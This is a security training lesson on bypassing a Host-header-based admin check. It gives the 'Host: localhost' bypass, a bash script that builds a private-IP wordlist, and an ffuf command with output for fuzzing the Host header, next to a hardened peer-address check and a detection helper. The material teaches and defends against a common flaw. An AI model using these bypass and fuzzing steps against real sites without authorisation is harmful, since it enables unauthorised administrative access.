Abusing HTTP Misconfigurations
Authentication Bypass
Exploiting host header attacks is not trivial in most cases. For some host header attacks, we need to understand how the web application works, how it uses the host header, and which values we need to inject to bypass checks.
In our first host header attack example, we will have a look at a simple vulnerable web application that conducts an authentication check based on the host header.
Identification & Exploitation
When accessing the web application, we can see a simple website with an admin area:
However, when we attempt to access the admin area at /admin.php, we notice that we are unauthorized to do so:
The web application displays an error that states "The admin area can only be accessed locally!". The wording suggests that the admin area may only be reached from the internal network of the web application. This raises the question: how does the web application decide whether a request originates from an internal network or from an external source?
The most obvious and secure option is to check the IP address of the request. In PHP this is done with the $_SERVER['REMOTE_ADDR'] variable, which holds the address of the TCP peer. Note that behind a reverse proxy this value is the proxy's address rather than the client's, so the application would then have to rely on a forwarding header that it accepts only from its own trusted proxy. Another option is to check the Host header; however, since the Host header is fully controlled by the client, this leaves the web application vulnerable to host header attacks.
When we set the host header to localhost, indicating that the website was accessed locally, we can bypass the authentication check and access the admin area:
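As an added illustration (not code from the original module), the following Python mirrors the vulnerable Host-header check beside a hardened check based on the peer address (the equivalent of PHP's $_SERVER['REMOTE_ADDR']) that also covers the reverse-proxy case mentioned above. The proxy address 10.0.0.5, the internal ranges, the vhost name app.example.internal and the sample requests are assumptions constructed for the example.

```python
import ipaddress

# Assumptions for this example (not from the original page): the app sits behind one
# reverse proxy at 10.0.0.5 and treats loopback and 192.168.0.0/16 as "local".
INTERNAL_NETS = [ipaddress.ip_network("127.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
TRUSTED_PROXIES = {"10.0.0.5"}
ALLOWED_HOSTS = {"app.example.internal"}  # the vhost the app is actually served as

def _is_internal(addr):
    """True if addr parses as an IP address inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)

def host_header_check(environ):
    """Vulnerable check, mirroring the page's admin.php: it trusts the
    client-supplied Host header, so 'Host: localhost' passes from anywhere."""
    host = environ.get("HTTP_HOST", "").split(":")[0]
    return host == "localhost" or _is_internal(host)

def remote_addr_check(environ):
    """Hardened check: decide on the TCP peer address (PHP's $_SERVER['REMOTE_ADDR']).
    Behind a trusted proxy, use only the address our proxy appended last to
    X-Forwarded-For; earlier entries are attacker-controlled."""
    peer = environ.get("REMOTE_ADDR", "")
    if peer in TRUSTED_PROXIES:
        xff = environ.get("HTTP_X_FORWARDED_FOR", "")
        peer = xff.split(",")[-1].strip() if xff else ""
    return _is_internal(peer)

def suspicious_host(environ):
    """Detection helper: flag any request whose Host header is not a
    vhost this application is configured to serve."""
    host = environ.get("HTTP_HOST", "").split(":")[0]
    return host not in ALLOWED_HOSTS

# Constructed sample requests in WSGI/CGI environ form (not real traffic).
SPOOFED = {"REMOTE_ADDR": "203.0.113.7", "HTTP_HOST": "localhost"}
LOCAL = {"REMOTE_ADDR": "127.0.0.1", "HTTP_HOST": "app.example.internal"}
PROXIED_OK = {"REMOTE_ADDR": "10.0.0.5", "HTTP_HOST": "app.example.internal",
              "HTTP_X_FORWARDED_FOR": "192.168.1.20"}
PROXIED_SPOOF = {"REMOTE_ADDR": "10.0.0.5", "HTTP_HOST": "localhost",
                 "HTTP_X_FORWARDED_FOR": "127.0.0.1, 203.0.113.7"}
```

Running the two checks over the sample requests shows that the Host-based check accepts SPOOFED and PROXIED_SPOOF while the peer-address check rejects both and still admits genuine local and proxied-internal requests.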

Fuzzing
If the web application accepts only specific IPs of an internal network, manual testing is impractical because of the large number of private IP addresses. However, we can fuzz the host header to check whether any of them bypasses the authentication check. For instance, to create a wordlist of the 192.168.0.0-192.168.255.255 private IP address range, we could use a bash script similar to the following (both octets run from 0 to 255 so that the full range is covered):
    # write every address in 192.168.0.0/16 to ips.txt, one per line
    for a in {0..255}; do
        for b in {0..255}; do
            echo "192.168.$a.$b" >> ips.txt
        done
    done
We can then use a fuzzer like ffuf to fuzz the host header for IP addresses that bypass the host header check:
$ ffuf -u http://IP:PORT/admin.php -w ips.txt -H 'Host: FUZZ' -fs 752
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://IP:PORT/admin.php
:: Wordlist : FUZZ: ips.txt
:: Header : Host: FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 752
________________________________________________
192.168.178.28 [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]
192.168.178.32 [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]
192.168.178.156 [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]
For more information on fuzzing with ffuf, have a look at this module.